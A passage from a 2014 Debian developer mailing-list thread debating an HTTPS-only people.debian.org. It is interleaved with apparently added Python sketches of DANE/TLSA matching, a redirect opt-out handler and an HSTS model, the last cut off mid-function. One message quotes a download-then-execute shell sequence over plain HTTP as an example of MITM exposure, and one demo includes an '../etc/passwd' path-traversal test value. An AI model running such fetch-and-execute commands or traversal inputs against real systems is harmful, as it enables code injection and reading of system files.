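        out.append(value[pos:nxt])
        pos = nxt
    return out


def extract_spki(cert_der):
    """Return the DER SubjectPublicKeyInfo. TBSCertificate is SEQ { [0] version
    OPTIONAL, serialNumber, signature, issuer, validity, subject, spki, ... }."""
    _, cert_body, _ = der_read_tlv(cert_der, 0)
    _, tbs_body, _ = der_read_tlv(der_children(cert_body)[0], 0)
    fields = der_children(tbs_body)
    if fields[0][0] == 0xA0:                # explicit [0] version tag present
        fields = fields[1:]
    return fields[5]


def tlsa_matches(cert_der, usage, selector, matching_type, assoc_data):
    """Does the presented end-entity certificate satisfy this TLSA record?"""
    if usage != USAGE_DANE_EE:
        raise NotImplementedError("only DANE-EE (usage 3) is modelled here")
    if selector == SELECTOR_FULL_CERT:
        subject = cert_der
    elif selector == SELECTOR_SPKI:
        subject = extract_spki(cert_der)
    else:
        raise ValueError("unknown selector %d" % selector)
    if matching_type == MATCH_EXACT:
        expected = subject
    elif matching_type == MATCH_SHA256:
        expected = hashlib.sha256(subject).digest()
    else:
        raise ValueError("unknown matching type %d" % matching_type)
    return hmac.compare_digest(expected, assoc_data)


def parse_tlsa(text):
    """Parse the zone-file form '3 1 1 <hex>' into (usage, selector, mtype, data)."""
    usage, selector, mtype, hexdata = text.split(None, 3)
    return int(usage), int(selector), int(mtype), bytes.fromhex(hexdata.replace(" ", ""))


# --- constructed test certificates (no signature, empty names) -----------------
def der(tag, content):
    n = len(content)
    length = bytes([n]) if n < 0x80 else (bytes([0x81, n]) if n < 0x100 else bytes([0x82, n >> 8, n & 0xFF]))
    return bytes([tag]) + length + content

RSA_OID = der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01")         # rsaEncryption
SHA256_RSA_OID = der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b")  # sha256WithRSAEncryption


def constructed_spki(key_byte):
    """SPKI with the rsaEncryption OID and a dummy BIT STRING standing in for the key."""
    return der(0x30, der(0x30, RSA_OID + der(0x05, b"")) + der(0x03, b"\x00" + bytes([key_byte]) * 32))


def constructed_cert(spki, serial):
    tbs = der(0x30, b"".join([
        der(0xA0, der(0x02, b"\x02")),                                         # [0] version v3
        der(0x02, bytes([serial])),                                            # serialNumber
        der(0x30, SHA256_RSA_OID),                                             # signature alg
        der(0x30, b""),                                                        # issuer (empty)
        der(0x30, der(0x17, b"140720000000Z") + der(0x17, b"150720000000Z")),  # validity
        der(0x30, b""),                                                        # subject (empty)
        spki,
    ]))
    return der(0x30, tbs + der(0x30, SHA256_RSA_OID) + der(0x03, b"\x00" * 17))


def demo():
    """Returns (spki pin ok, full-cert pin ok, reissued cert vs spki pin,
    reissued cert vs full-cert pin, attacker's cert vs spki pin)."""
    server_spki = constructed_spki(0x01)
    server_cert = constructed_cert(server_spki, serial=1)
    u, s, m, data = parse_tlsa("3 1 1 " + hashlib.sha256(server_spki).hexdigest())
    full_pin = hashlib.sha256(server_cert).digest()              # what a "3 0 1" record holds
    reissued = constructed_cert(server_spki, serial=2)           # same key, new certificate
    mitm_cert = constructed_cert(constructed_spki(0x42), serial=1)  # different key, same name
    return (tlsa_matches(server_cert, u, s, m, data),
            tlsa_matches(server_cert, 3, 0, 1, full_pin),
            tlsa_matches(reissued, u, s, m, data),
            tlsa_matches(reissued, 3, 0, 1, full_pin),
            tlsa_matches(mitm_cert, u, s, m, data))
```

The reissue case is why "3 1 1" is the usual recommendation: pinning the SPKI survives a certificate renewal with the same key, whereas a "3 0 1" record has to be republished (with DNSSEC re-signing and TTL lead time) on every reissue, and a stale one locks legitimate clients out. None of this helps a client that never asks for the TLSA record, which is Tollef's objection above.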
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 11:06:00, Tim Retout wrote:
> On 20 July 2014 10:07, Wouter Verhelst <w...@uter.be> wrote:
> > With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring.
>
> Good, because that's not what HTTPS does for you. It makes it more difficult to watch exactly what you're accessing.
>
> Suppose for example I uploaded a preseed file to people.debian.org that created a Tor relay, and a suitably large government agency wanted to see all the IP addresses installing it. With HTTP, they just break into the internet backbone at an appropriate point, and log every request for that file in a *completely undetectable manner*. With HTTPS, they either need to break into the machine running people.debian.org, or start presenting a different SSL certificate - both things which can potentially be detected.
>
> Another situation is if a dissident accesses people.debian.org via Tor. With HTTP, the operator of the exit node they are using could MITM the request and tamper with the file - no state intervention required. If it's a web page, they could potentially attempt to exploit the browser.

These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP.

That there might be a reason why a user would want to use encryption does not negate that there might be a reason why a user would *not* want to use encryption. I'm claiming the reasons as in the latter exist; one (and not the least) of which is that downloading files off people.debian.org from d-i preseeding happens today, is a valid use of that service, and cannot be done if HTTP is disabled.

If you think there aren't such valid reasons, you either need to show me why my claim is wrong, or why the costs to doing so outweigh the benefits. So far I haven't seen anyone do that.

[...]

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/1716734.flo03rq...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 12:53:59, Jeroen Dekkers wrote:
> At Sun, 20 Jul 2014 11:07:16 +0200, Wouter Verhelst wrote:
> > Even ignoring that, assuming people trust that code off people.debian.org is safe, if they run a validating DNS resolver they don't run more of a risk than if they use only HTTPS.
>
> I don't really follow that. A validating DNS resolver only makes sure you connect to the right IP address. DANE can specify the certificate to use for HTTPS, but you can't forward HTTP requests to HTTPS with DANE as far as I know.

If someone manages to break DNSSEC in such a way that they can redirect your DNS requests to an IP address of their choosing, they can also replace DANE records out from under your feet.

But I agree that the argument is somewhat weak. It's also not my core argument.

> In the case of HTTP a MITM attack can send a fake response to the HTTP request without the need for any key material/certificates or need to fake DNSSEC. For HTTPS it would need to have a certificate for people.debian.org that the client trusts.

True.

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/4767887.t6llxl5...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, July 20, 2014 08:15, Wouter Verhelst wrote:
> On Saturday 19 July 2014 22:54:47, you wrote:
> > > Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated.
> >
> > Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks
>
> True, but debian-installer simply does not support any signed/encrypted preseeding.

If you insist on using http, you can also just host your preseed files on http://grep.be. I don't see why DSA should wait to implement improvements to Debian services while there are perfect alternatives available to suit your use case.

Hosting stuff on people.debian.org gives it some air of legitimacy, "this is approved by people associated with Debian". It only makes sense to me that if we want to provide a service that associates content with Debian, we make that service as secure and trustworthy as possible.

Thijs

Archive: https://lists.debian.org/862e3205c73028bb44e472d667cd80d6.squir...@aphrodite.kinkhorst.nl
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 11:38:13, Marc Haber wrote:
> On Sun, 20 Jul 2014 10:45:10 +0200, Wouter Verhelst <w...@uter.be> wrote:
> > On Sunday 20 July 2014 09:23:55, you wrote:
> > > On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote:
> > > > Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.
> > >
> > > But that implies that the attacker has access to private keys, and in this case you are so screwed.
> >
> > My point exactly: if someone can somehow MITM people.debian.org they have access to private key material that they shouldn't have access to.
>
> I might be missing something, and I admit not having read the entire thread, but how would they have access to private key material?

Beyond GPG keys there are also DNSSEC private keys, SSL private keys, and (to some extent) router administration passwords could also be considered private keys.

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/15798403.9o3vuy3...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014 13:21:03 +0200, Wouter Verhelst <w...@uter.be> wrote:
> On Sunday 20 July 2014 11:38:13, Marc Haber wrote:
> > I might be missing something, and I admit not having read the entire thread, but how would they have access to private key material?
>
> Beyond GPG keys there are also DNSSEC private keys, SSL private keys, and (to some extent) router administration passwords could also be considered private keys.

Why would material of that kind (short of the SSL private key for the https server) be on p.d.o?

Greetings
Marc

-- 
-------------------------------------- !! No courtesy copies, please !! -----
Marc Haber         |   " Questions are the         | Mailadresse im Header
Mannheim, Germany  |     Beginning of Wisdom "     | http://www.zugschlus.de/
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834

Archive: https://lists.debian.org/e1x8pij-0008ty...@swivel.zugschlus.de
Re: people.debian.org will move from ravel to paradis and become HTTPS only
]] Wouter Verhelst

> > > AFAIK, people.debian.org does not allow running server-side HTTP scripts (and even if it does, I think that's a bad idea and we should disable it ASAP). As such, people.debian.org is not an interface for reading mail in your browser over HTTP, or doing IRC, or whatnot. So that argument simply doesn't apply.
> >
> > There is no need for server-side HTTP scripts to run IRC in your browser. http://glowing-bear.github.io/glowing-bear/ talks to weechat, for instance.
> >
> > > Instead, people.d.o is a place to allow downloads of files. Period.
> >
> > That's not the only thing people use it for, though. They use it for hosting web pages, their blog and so on.
> >
> > > Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.
> >
> > Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection.
>
> If you can MITM people.debian.org, you've already MITM'ed a DNSSEC-secured domain.

I see there's some confusion here. I'm talking about a TCP level MITM attack, not a DNS hijacking attack, which seems to be what you're talking about. Hijacking TCP is trivial and happens (intentionally and by mistake) very, very often.

> > > Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus "HTTP is obsolete" idea?
> >
> > There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.
>
> So name one?

To pick a random example off a web page: http://ghantoos.org/2012/10/21/cocktail-of-pxe-debian-preseed-ipmi-puppet/

  wget http://people.debian.org/~dannf/add-firmware-to/add-firmware-to
  sed -i 's/lenny/wheezy/' add-firmware-to
  chmod +x add-firmware-to
  ./add-firmware-to initrd.gz initrd.nonfree.gz wheezy

> The problem here is not the idea that someone might MITM people.debian.org and provide something useless. The problem is a culture of people who run random code off the web without checking what it does.

That is also a problem, yes. Using HTTP makes it worse than if it was using HTTPS.

-- 
Tollef Fog Heen
UNIX is user friendly, it's just picky about who its friends are

Archive: https://lists.debian.org/m2pph0qmq6@rahvafeir.err.no
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP.

Pray tell: How do you make it default.

-- 
Peter Palfrader | http://www.palfrader.org/

Archive: https://lists.debian.org/20140720115220.gk...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 10:38:23AM +0200, Matthias Urlichs wrote:
> > Pervasive monitoring.
>
> In and of itself, if you only access publicly-available files, that's not a threat.

1. Security service has unknown exploit.
2. Pervasive monitoring sees you install a package from somewhere over HTTP.
3. Attack is automated in a targeted fashion.

I don't see that this is beyond the realm of possibility. This is really only a reason for having HTTPS as default, not excluding those who can't use HTTPS for legal, technical or other reasons.

Iain.

-- 
e: i...@fsfe.org  w: iain.learmonth.me  x: i...@jabber.fsfe.org  t: +447875886930  c: MM6MVQ  g: IO87we
p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 12:03:59PM +0200, Jakub Wilk wrote:
> My proposal: http://nohttps.people.debian.org/~user/file

This is similar to my proposal[1], using a separate VHOST that would allow HTTP access. It's clear in the URL what is going on, and most people will be using HTTPS but there are very good reasons for not using HTTPS. You just might not have thought of them yet.

The main one is that there are places in the world you just can't use HTTPS for legal reasons and the second one being that there is hardware that just can't handle HTTPS.

[1]: https://lists.debian.org/debian-devel/2014/07/msg00480.html

Iain.

-- 
e: i...@fsfe.org  w: iain.learmonth.me  x: i...@jabber.fsfe.org  t: +447875886930  c: MM6MVQ  g: IO87we
p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 01:52:20PM +0200, Peter Palfrader wrote:
> On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> > These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP.
>
> Pray tell: How do you make it default.

See: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security

It sends a header to tell you you should be using HTTPS. I am happy however to just use a separate VHOST for non-HTTPS access.

Iain.

-- 
e: i...@fsfe.org  w: iain.learmonth.me  x: i...@jabber.fsfe.org  t: +447875886930  c: MM6MVQ  g: IO87we
p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Iain R. Learmonth wrote:
> > Pray tell: How do you make it default.
>
> See: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security
>
> It sends a header to tell you you should be using HTTPS.

Alas, that's not what HSTS is about or for. It cannot be used for this.

-- 
Peter Palfrader | http://www.palfrader.org/

Archive: https://lists.debian.org/20140720122542.gl...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 20/07/2014 11:01, Peter Palfrader wrote:
> > I do think that if DSA are going to enforce such a policy, they should be able to explain why.
>
> What Ondřej said

a.k.a. “because”. Do try better.

– j.

Archive: https://lists.debian.org/c34936335ed61fa36ed5657b33eea...@hell.pl
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 13:52:20, Peter Palfrader wrote:
> On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> > These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP.
>
> Pray tell: How do you make it default.

- Enable HSTS on the domain
- Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export.
- Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this:

    User-Agent: *
    Disallow: /

With those three easy steps, the only URLs that people will ever find will be HTTPS URLs. 99% of your traffic will be HTTPS traffic, and that will be a good thing. Yet when necessary, doing unencrypted HTTP will still be possible.

It still misses something like step 2 for wiki.debian.org and all other stuff out there, but because of step 1 that shouldn't be *too* much of a problem.

This will also help in, say, the (granted, hypothetical) scenario where a package in unstable breaks the system so badly that downloading files over HTTPS is no longer possible and a maintainer wants to post a (GPG-signed) patch over on http://people.debian.org

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/4187590.a2xdfsn...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 13:28:43, Marc Haber wrote:
> On Sun, 20 Jul 2014 13:21:03 +0200, Wouter Verhelst <w...@uter.be> wrote:
> > On Sunday 20 July 2014 11:38:13, Marc Haber wrote:
> > > I might be missing something, and I admit not having read the entire thread, but how would they have access to private key material?
> >
> > Beyond GPG keys there are also DNSSEC private keys, SSL private keys, and (to some extent) router administration passwords could also be considered private keys.
>
> Why would material of that kind (short of the SSL private key for the https server) be on p.d.o?

I didn't say that.

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/23447020.uajmmu5...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014, at 12:06, Tim Retout wrote:
> On 20 July 2014 10:07, Wouter Verhelst <w...@uter.be> wrote:
> > With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring.
>
> Good, because that's not what HTTPS does for you. It makes it more difficult to watch exactly what you're accessing.
>
> Suppose for example I uploaded a preseed file to people.debian.org that created a Tor relay, and a suitably large government agency wanted to see all the IP addresses installing it. With HTTP, they just break into the internet backbone at an appropriate point, and log every request for that file in a *completely undetectable manner*. With HTTPS, they either need to break into the machine running people.debian.org, or start presenting a different SSL certificate - both things which can potentially be detected.
>
> Another situation is if a dissident accesses people.debian.org via Tor. With HTTP, the operator of the exit node they are using could MITM the request and tamper with the file - no state intervention required. If it's a web page, they could potentially attempt to exploit the browser.
>
> [...]

This is an excellent summary, thank you Tim.

We should not forget that the metadata are interesting too (and thus we also need DNS privacy, which we don't have right now).

Also one of the reasons to encrypt everywhere is that it makes it much harder to decrypt everything. The more encrypted noise we have in the background the better.

P.S.: And I am not known for my love for CAs :)...

Ondrej

-- 
Ondřej Surý <ond...@sury.org>
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server

Archive: https://lists.debian.org/1405869571.23682.143634353.4b92d...@webmail.messagingengine.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> > > These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP.
> >
> > Pray tell: How do you make it default.
>
> - Enable HSTS on the domain
> - Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export.
> - Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this:

None of these brings people who type in people.debian.org into their browser to https.

-- 
Peter Palfrader | http://www.palfrader.org/

Archive: https://lists.debian.org/20140720161914.gn...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 06:19:14PM +0200, Peter Palfrader wrote:
> None of these brings people who type in people.debian.org into their browser to https.

Right. AFAICT the only technical change that will do that (sanely) is an HTTP-level redirection from http://(.*) to https://$1 . Having that enabled by default, plus a way for DDs to opt-out to the redirection (dunno, by dropping .no-https-by-default files in suitable sub-directories of ~/public_html) would nicely address the few objections I've seen in this thread.

FWIW:

- it's not entirely clear how much extra work implementing this would require. In particular, I haven't put much thought in an easy way to implement the directory-level opt-out.
- I *personally* don't mind having https only, quite the contrary! But I got hooked by the discussions and couldn't resist proposing an API :) (sorry)

Cheers.

-- 
Stefano Zacchiroli  . . . . . . .  z...@upsilon.cc . . . . o . . . o . o
Maître de conférences . . . . . http://upsilon.cc/zack . . . o . . . o o
Former Debian Project Leader  . . @zack on identi.ca . . o o o . . . o .
« the first rule of tautology club is the first rule of tautology club »
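The redirect-with-opt-out scheme proposed above, worked through as an added example (this is not DSA's configuration or anything deployed on people.debian.org): a request handler maps /~user/ paths onto ~user/public_html, answers plain-HTTP requests with a redirect to the https:// URL by default, and serves over HTTP only where a .no-https-by-default marker exists in the requested directory or one of its parents up to public_html. The marker name and the UserDir layout are the proposal's; the function names, the path-escape check and the constructed temporary home tree are assumptions of this example.

```python
"""Per-directory HTTP->HTTPS redirect opt-out, as sketched in the thread.
Added example; the marker name is the proposal's, everything else is assumed."""
import os
import posixpath
import tempfile
from urllib.parse import urlsplit

MARKER = ".no-https-by-default"


def resolve_userdir(path, home_root):
    """Map a /~user/rest request path onto <home_root>/user/public_html/rest.

    Returns (docroot, target) or None for paths outside UserDir space or
    that try to escape the user's public_html via '..' components."""
    norm = posixpath.normpath(path)  # collapses '..' before we look at it
    if not norm.startswith("/~"):
        return None
    user, _, rest = norm[2:].partition("/")
    if not user or user.startswith("."):
        return None
    docroot = os.path.join(home_root, user, "public_html")
    target = os.path.normpath(os.path.join(docroot, rest))
    if target != docroot and not target.startswith(docroot + os.sep):
        return None  # defence in depth: never serve outside public_html
    return docroot, target


def opted_out(docroot, target):
    """True if MARKER exists in target's directory or any parent up to docroot."""
    directory = target if os.path.isdir(target) else os.path.dirname(target)
    while True:
        if os.path.exists(os.path.join(directory, MARKER)):
            return True
        if directory == docroot:
            return False  # reached the top of the user's web space
        parent = os.path.dirname(directory)
        if parent == directory:
            return False
        directory = parent


def handle(request_url, home_root):
    """Decide what the server does with one request.

    Returns ('redirect', https_url), ('serve', fs_path) or ('reject', reason)."""
    parts = urlsplit(request_url)
    resolved = resolve_userdir(parts.path, home_root)
    if resolved is None:
        return ("reject", "bad path")
    docroot, target = resolved
    if parts.scheme == "https" or opted_out(docroot, target):
        return ("serve", target)
    https_url = "https://" + parts.netloc + parts.path
    if parts.query:
        https_url += "?" + parts.query
    return ("redirect", https_url)


def build_sample_tree():
    """Constructed home tree: ~alice opts out only for public_html/preseed/."""
    root = tempfile.mkdtemp(prefix="pdo-example-")
    for rel in ("alice/public_html/preseed", "alice/public_html/blog"):
        os.makedirs(os.path.join(root, rel))
    for rel in ("alice/public_html/preseed/" + MARKER,
                "alice/public_html/preseed/wheezy.cfg",
                "alice/public_html/blog/index.html"):
        open(os.path.join(root, rel), "w").close()
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for url in ("http://people.debian.org/~alice/preseed/wheezy.cfg",
                "http://people.debian.org/~alice/blog/index.html",
                "http://people.debian.org/~alice/../etc/passwd"):
        print(url, "->", handle(url, root))
```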
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 2014-07-20 08:15, Wouter Verhelst wrote:
> True, but debian-installer simply does not support any signed/encrypted preseeding.
>
> […]
>
> Granted, these are probably bugs, and IIRC Colin was working on providing HTTPS support for jessie. Still, while I support enabling HTTPS for people.d.o, I think disabling HTTP is overdoing it.

FWIW, Ubuntu trusty and precise both support HTTPS now (support was backported from trusty). wget would need to build a udeb in Debian and be able to take over /usr/bin/wget from busybox in d-i. I think the other changes are all in d-i parts. Basically you append trusted certs to the initramfs by specifying two initrds in the bootloader that are concatenated. Somebody™ would need to do the work, though.

Kind regards
Philipp Kern

Archive: https://lists.debian.org/74fc1c373ee2fe713a654169c129a...@hub.kern.lc
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 08:23:58PM +0200, Philipp Kern wrote:
> On 2014-07-20 08:15, Wouter Verhelst wrote:
> > True, but debian-installer simply does not support any signed/encrypted preseeding.
> >
> > […]
> >
> > Granted, these are probably bugs, and IIRC Colin was working on providing HTTPS support for jessie. Still, while I support enabling HTTPS for people.d.o, I think disabling HTTP is overdoing it.
>
> FWIW, Ubuntu trusty and precise both support HTTPS now (support was backported from trusty). wget would need to build a udeb in Debian and be able to take over /usr/bin/wget from busybox in d-i. I think the other changes are all in d-i parts. Basically you append trusted certs to the initramfs by specifying two initrds in the bootloader that are concatenated. Somebody™ would need to do the work, though.

I'll hopefully get to finishing this at DebConf; I think I merged most of the safe and independent pieces already, and mostly just need to deal with wget-udeb. I'm not expecting to backport this to wheezy though.

-- 
Colin Watson [cjwat...@debian.org]

Archive: https://lists.debian.org/20140720183026.ga15...@riva.ucam.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 18:19:14, Peter Palfrader wrote:
> On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> > > > These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP.
> > >
> > > Pray tell: How do you make it default.
> >
> > - Enable HSTS on the domain
> > - Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export.
> > - Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this:
>
> None of these brings people who type in people.debian.org into their browser to https.

If they type it in because they want to avoid HTTPS for whatever local reason, then that's a feature, not a bug.

If they type it in because they were given a HTTP URL rather than a HTTPS one by someone else, then you should cluebat that someone else. Write a bot for IRC that cluebats people automatically if they provide HTTP rather than HTTPS URLs, for instance. Complain on mailinglists if you want to.

If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically. What's the problem?

Unencrypted traffic is *not* evil. Neither are people who for whatever local reason need to disable HTTPS.

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/3393543.bd2t4uq...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Stefano Zacchiroli wrote:
> AFAICT the only technical change that will do that (sanely) is an HTTP-level redirection from http://(.*) to https://$1 .

That is my understanding as well.

> - it's not entirely clear how much extra work implementing this would require. In particular, I haven't put much thought in an easy way to implement the directory-level opt-out.
> - I *personally* don't mind having https only, quite the contrary! But I got hooked by the discussions and couldn't resist proposing an API :) (sorry)

IMO, a dedicated vhost name sounds much more appealing than magic apache configs. I wonder whether it should use the same UserDirs.

-- 
Peter Palfrader | http://www.palfrader.org/

Archive: https://lists.debian.org/20140720190005.gp...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 07/20/2014 03:08 PM, Wouter Verhelst wrote:
> On Sunday 20 July 2014 18:19:14, Peter Palfrader wrote:
> > None of these brings people who type in people.debian.org into their browser to https.
>
> If they type it in because they want to avoid HTTPS for whatever local reason, then that's a feature, not a bug.
>
> If they type it in because they were given a HTTP URL rather than a HTTPS one by someone else, then you should cluebat that someone else.

What if they don't type in any protocol, but just type in the server name? That's very common among people who are less technically inclined (and who bother to type URLs at all), and even among those who are more so, ever since the day browsers first implemented the necessary smarts to let it work in the first place.

Most browsers, and for that matter other HTTP clients, will default to trying HTTP - not HTTPS - if given a URL that doesn't specify any protocol. I'm anal-retentive about typing the full URL (including protocol) manually when not just clicking on a link, as a matter of standing on principle, and even I just accept that default sometimes.

Changing that default, without forcing HTTPS in the way which people in this thread are objecting to, would seem to require changing all of those clients - a much, much bigger proposition than the administrators of any one server can practically tackle.

-- 
The Wanderer

Secrecy is the beginning of tyranny. A government exists to serve its citizens, not to control them.

Archive: https://lists.debian.org/53cc1648.10...@fastmail.fm
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically.

Alas, no.

-- 
Peter Palfrader | http://www.palfrader.org/

Archive: https://lists.debian.org/20140720192247.gq...@anguilla.noreply.org
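To make the disagreement in the last two messages concrete, here is an added model of a client-side HSTS store following RFC 6797 (example code written for this page, not anything from the thread or from a browser). RFC 6797 section 8.1 has user agents ignore a Strict-Transport-Security header received over insecure transport, so a client that has only ever fetched http://people.debian.org keeps using plain HTTP no matter what the server sends, while a client that has made one https:// visit gets its http:// URLs upgraded until max-age runs out. Host names, timestamps and header values below are constructed.

```python
"""Model of a browser's HSTS cache (RFC 6797).  Added illustration, not code
from the thread; host names, timestamps and header values are constructed."""
import time
from urllib.parse import urlsplit, urlunsplit


def parse_hsts(header):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains),
    or None when there is no usable max-age directive."""
    max_age, include_sub = None, False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            value = value.strip().strip('"')
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
    return None if max_age is None else (max_age, include_sub)


class HstsStore:
    """The client's list of known HSTS hosts: host -> (expiry, include_subdomains)."""

    def __init__(self):
        self._hosts = {}

    def observe_response(self, host, scheme, sts_header, now=None):
        """Record a policy from a response.  RFC 6797 section 8.1 only honours the
        header over a secure transport, so a value seen on plain HTTP is ignored;
        that is why HSTS cannot help a client that has only ever used http://."""
        now = time.time() if now is None else now
        if scheme != "https":
            return False
        parsed = parse_hsts(sts_header)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        if max_age == 0:
            self._hosts.pop(host, None)  # max-age=0 deletes the policy
        else:
            self._hosts[host] = (now + max_age, include_sub)
        return True

    def _policy_for(self, host, now):
        # Exact host first, then each parent domain that set includeSubDomains.
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self._hosts.get(".".join(labels[i:]))
            if entry is None or entry[0] <= now:  # unknown or expired
                continue
            if i == 0 or entry[1]:
                return True
        return False

    def rewrite(self, url, now=None):
        """Return the URL the client actually fetches (http:// upgraded if known)."""
        now = time.time() if now is None else now
        p = urlsplit(url)
        if p.scheme != "http" or not self._policy_for(p.hostname, now):
            return url
        netloc = p.hostname + (":%d" % p.port if p.port and p.port != 80 else "")
        return urlunsplit(("https", netloc, p.path, p.query, p.fragment))


def demo(host="people.debian.org"):
    """The thread's scenario; returns the URL fetched at each step."""
    store = HstsStore()
    t0 = 1405850000  # constructed 'now' (epoch seconds)
    url = "http://%s/~user/file" % host
    fetched = [store.rewrite(url, now=t0)]  # 1. typed http://, nothing known yet
    # A policy header on the plain-HTTP response changes nothing.
    store.observe_response(host, "http", "max-age=31536000", now=t0)
    fetched.append(store.rewrite(url, now=t0 + 1))
    # 2. After one https:// visit the header takes effect and http:// is upgraded.
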